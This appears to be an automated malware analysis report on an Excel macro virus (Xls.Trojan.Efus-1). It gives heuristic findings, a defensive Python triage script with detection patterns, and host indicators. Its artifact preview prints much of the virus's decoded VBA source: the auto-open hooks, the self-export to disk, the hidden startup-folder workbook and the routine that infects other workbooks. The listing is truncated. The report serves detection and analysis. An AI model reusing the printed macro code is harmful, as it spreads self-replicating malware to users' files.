Verdict: MALICIOUS
Risk Score: 160
Malware Insights
MITRE ATT&CK
- T1059.005 Command and Scripting Interpreter: Visual Basic
- T1566.001 Phishing: Spearphishing Attachment
ClamAV's critical signature match identifies the file as Xls.Trojan.Efus-1. The high-severity heuristics flag Auto_Open and Auto_Close procedures, which Excel runs automatically when the workbook is opened and closed, so the payload needs no user action beyond opening the attachment. The extracted module (VB_Name "SUFE", signed "SunUFeiEr" in its header comment) is a self-replicating Excel macro virus rather than a downloader: on open it sets Application.AltStartupPath to C:\MS_DOS, writes its own source to c:\Ms_IO.sys through the VBE object model (CodeModule.Lines), creates a hidden workbook C:\MS_DOS\Command.DOS that imports that module (VBComponents.Import), and registers Application.OnWindow so the Action routine runs on every window activation. Action then imports the SUFE module into every other open workbook that does not already contain it. Because the dropped workbook sits in Excel's alternate startup folder, it is reopened on every Excel launch, which is the persistence mechanism; the file-system paths above are the host-side indicators to sweep for.
Heuristics (4)
| Finding | Severity | Rule | Detail |
|---|---|---|---|
| ClamAV: Xls.Trojan.Efus-1 | critical | CLAMAV_DETECTION | ClamAV detected this file as malware: Xls.Trojan.Efus-1 |
| VBA macros detected (2 related findings) | medium | OLE_VBA_MACROS | Document contains VBA macro code |
| Auto_Open macro | high | OLE_VBA_AUTO | Auto_Open macro |
| Auto_Close macro | high | OLE_VBA_AUTOCLOSE | Auto_Close macro |
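As an added example (not part of this report and not the analyzer's own heuristic engine), the following Python script performs the same kind of triage on decoded VBA source as the findings above, but goes a step further than the auto-exec checks: it lists the procedures Excel runs without user interaction (the OLE_VBA_AUTO / OLE_VBA_AUTOCLOSE findings), flags the self-replication and persistence calls that are visible in the SUFE module listed below, and extracts the file-system paths as IOCs. The input is a constructed, condensed excerpt of the decoded macros.bas source shown in this report; the indicator keys, descriptions and verdict strings are this example's own, not rule names from the analyzer.

```python
import re

# Constructed input: a condensed excerpt of the decoded SUFE module from the
# macros.bas artifact in this report (same API calls, most plumbing removed).
SAMPLE_VBA = r'''
Attribute VB_Name = "SUFE"
'\Hello!Be sure to make good use of this piece of virus code.Good luck!
Sub Auto_open()
On Error Resume Next
Call Option_Set
Call Settle_C
End Sub
Sub Auto_close()
On Error Resume Next
End Sub
Sub Option_Set()
With Application
.AltStartupPath = "C:\MS_DOS"
End With
End Sub
Sub Settle_C()
Application.OnWindow = "C:\MS_DOS\Command.DOS!Action"
MkDir ("c:\MS_DOS")
Application.ActiveWorkbook.VBProject.VBComponents.Import ("c:\Ms_IO.sys")
ActiveWorkbook.SaveAs FileName:="C:\MS_DOS\Command.DOS", FileFormat:=xlNormal
End Sub
Sub CodeExport()
Code = Modu.CodeModule.Lines(1, Modu.CodeModule.CountOfLines)
Open "c:\Ms_IO.sys" For Output Access Write As hFile
End Sub
'''

# Procedure names Office runs without user interaction (Excel and Word).
AUTOEXEC = {n.lower() for n in (
    "Auto_Open", "Auto_Close", "Auto_Exec", "AutoOpen", "AutoClose", "AutoExec",
    "Workbook_Open", "Workbook_Close", "Workbook_Activate",
    "Document_Open", "Document_Close")}

PROC_RE = re.compile(r"^(?:Public\s+|Private\s+)?(?:Sub|Function)\s+([A-Za-z_]\w*)", re.I)

# (key, description, pattern). Keys and wording are this example's own.
INDICATORS = [
    ("vbproject_import", "self-replication: imports a module into a workbook's VBProject", re.compile(r"VBComponents\.Import", re.I)),
    ("vbe_code_read", "self-replication: reads module source through the VBE", re.compile(r"CodeModule\.Lines", re.I)),
    ("file_write", "drops a file: opens a path for output", re.compile(r"\bOpen\b.+\bFor\s+Output\b", re.I)),
    ("alt_startup_path", "persistence: sets Excel's alternate startup folder", re.compile(r"\.AltStartupPath\s*=", re.I)),
    ("on_window", "persistence: Application.OnWindow hook runs on window activation", re.compile(r"Application\.OnWindow\s*=", re.I)),
    ("save_as", "drops a file: saves a workbook under a new name", re.compile(r"\.SaveAs\b", re.I)),
    ("mkdir", "creates a directory", re.compile(r"\bMkDir\b", re.I)),
    ("on_error_resume_next", "error suppression", re.compile(r"\bOn\s+Error\s+Resume\s+Next\b", re.I)),
]
PERSIST_OR_REPLICATE = {"vbproject_import", "vbe_code_read", "alt_startup_path", "on_window"}
# Drive-letter paths; stops at quotes, spaces and the '!' of Workbook!Macro references.
PATH_RE = re.compile(r"[A-Za-z]:\\[\w\\.\-]+")


def code_lines(vba):
    """Yield (lineno, stripped text) for non-comment lines; VBA comments start with ' or Rem."""
    for n, raw in enumerate(vba.splitlines(), 1):
        s = raw.strip()
        if not s or s.startswith("'") or s.lower().startswith("rem "):
            continue
        yield n, s


def triage(vba):
    """Return procedures, auto-exec entry points, indicator hits, path IOCs and a verdict."""
    procs, hits, paths = [], [], {}
    for n, s in code_lines(vba):
        m = PROC_RE.match(s)
        if m:
            procs.append(m.group(1))
        for key, desc, rx in INDICATORS:
            if rx.search(s):
                hits.append({"key": key, "desc": desc, "line": n, "text": s})
        for p in PATH_RE.findall(s):
            paths.setdefault(p.lower(), n)  # Windows paths are case-insensitive: dedupe lowercased
    autoexec = [p for p in procs if p.lower() in AUTOEXEC]
    keys = {h["key"] for h in hits}
    if autoexec and keys & PERSIST_OR_REPLICATE:
        verdict = "likely macro virus: auto-exec plus self-replication/persistence"
    elif autoexec:
        verdict = "auto-executing macro: review"
    elif keys:
        verdict = "suspicious API use without auto-exec"
    else:
        verdict = "no indicators"
    return {"procedures": procs, "autoexec": autoexec, "indicators": hits,
            "paths": sorted(paths), "verdict": verdict}


if __name__ == "__main__":
    r = triage(SAMPLE_VBA)
    print("verdict:", r["verdict"])
    print("auto-exec entry points:", ", ".join(r["autoexec"]))
    for h in r["indicators"]:
        print(f"  line {h['line']:3d} [{h['key']}] {h['text']}")
    print("path IOCs:", ", ".join(r["paths"]))
```

For a real sample, feed `triage()` the decoded source that oletools' olevba prints (the extractor named in the artifact table) instead of the embedded excerpt. The path list is what to sweep hosts for (here C:\MS_DOS\Command.DOS and C:\Ms_IO.sys), and the alt_startup_path and on_window hits are the reason the infection outlives the original attachment: Excel opens every workbook in the alternate startup folder on launch, and OnWindow re-runs the replication routine whenever a window is activated. Note that the comment filter only drops whole-line comments, so string literals and trailing comments can still produce hits; treat the output as triage, not a verdict.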
Extracted artifacts (1)
Files carved from inside the sample during analysis.
| Filename | Kind | Source | Size |
|---|---|---|---|
| macros.bas | vba-macro | oletools.olevba.extract_macros (decoded VBA source) | 11500 bytes |
SHA-256: 8b66f2e06aa19856356415eaa69135f2a6414fdb015358aa297765ac20e533de
Preview (first 1,000 lines of the extracted script):
Attribute VB_Name = "ThisWorkbook"
Attribute VB_Base = "0{00020819-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "Sheet1"
Attribute VB_Base = "0{00020820-0000-0000-C000-000000000046}"
Attribute VB_GlobalNameSpace = False
Attribute VB_Creatable = False
Attribute VB_PredeclaredId = True
Attribute VB_Exposed = True
Attribute VB_TemplateDerived = False
Attribute VB_Customizable = True
Attribute VB_Name = "SUFE"
'\
'\Hello!Be sure to make good use of this piece of virus code.Good luck!
'\ -SunUFeiEr
'\
Dim Modu
Dim Infected
Dim Code
Dim puJ
Sub Auto_open()
On Error Resume Next
Application.ScreenUpdating = False
Call Option_Set
Call Settle_C
Application.ScreenUpdating = True
Call Action
End Sub
Sub Auto_close()
On Error Resume Next
Call Action
Call Action_End
End Sub
Sub Option_Set()
On Error Resume Next
With Application
.UserName = "SUFE"
.AltStartupPath = "C:\MS_DOS"
.EnableSound = False
.RollZoom = False
End With
End Sub
Sub Settle_C()
Dim If_Settled As Boolean
On Error Resume Next
With Application.FileSearch
.LookIn = "C:\MS_DOS"
.FileName = "Command.dos"
If .Execute > 0 Then
If_Settled = True
End If
End With
If If_Settled = True Then
Application.MacroOptions Macro:="C:\MS_DOS\Command.DOS!Un_do", Description:="", _
ShortcutKey:="u"
Application.OnWindow = "C:\MS_DOS\Command.DOS!Action"
Call CodeExport
Exit Sub
Else
Call CodeExport
On Error Resume Next
MkDir ("c:\MS_DOS")
Workbooks.Add
Application.ActiveWorkbook.VBProject.VBComponents.Import ("c:\Ms_IO.sys")
ActiveWorkbook.SaveAs FileName:="C:\MS_DOS\Command.DOS", FileFormat:=xlNormal
ActiveWorkbook.Save
ActiveWindow.Visible = False
End If
Application.MacroOptions Macro:="C:\MS_DOS\Command.DOS!Un_do", Description:="", _
ShortcutKey:="u"
Application.OnWindow = "C:\MS_DOS\Command.DOS!Action"
End Sub
Sub Action()
On Error Resume Next
Application.ScreenUpdating = False
For puJ = 1 To Application.Workbooks.Count
If (Application.Workbooks(puJ).FullName <> "C:\MS_DOS\Command.DOS" _
And InStr(Application.Workbooks(puJ).FullName, "\") <> 0) Then
Call CodeImport_Simple
End If
Next puJ
Application.ScreenUpdating = True
Call Punish
End Sub
Sub CodeExport()
Dim i
Dim hFile As Long
On Error Resume Next
i = 0
For Each Modu In Application.VBE.ActiveVBProject.VBComponents
i = i + 1
If (Modu.Name = "SUFE") Then
Code = Application.VBE.ActiveVBProject.VBComponents(i).CodeModule.Lines(1, Application.VBE.ActiveVBProject.VBComponents(i).CodeModule.CountOfLines)
Code = "Attribute VB_Name = ""SUFE""" & Chr(13) & Code
Exit For
End If
Next Modu
hFile = FreeFile
Open "c:\Ms_IO.sys" For Output Access Write As hFile
Print #hFile, Code
Close hFile
End Sub
Sub CodeImport()
On Error Resume Next
Infected = False
For Each Modu In Application.ActiveWorkbook.VBProject.VBComponents
If (Modu.Name = "SUFE") Then
Infected = True
Exit For
End If
Next Modu
If Infected = False Then
Application.ActiveWorkbook.VBProject.VBComponents.Import ("c:\Ms_IO.sys")
Application.ActiveWorkbook.Save
End If
End Sub
Sub CodeImport_Simple()
On Error Resume Next
Infected = False
For Each Modu In Application.Workbooks(puJ).VBProject.VBComponents
If (Modu.Name = "SUFE") Then
Infected = True
Exit For
... (truncated)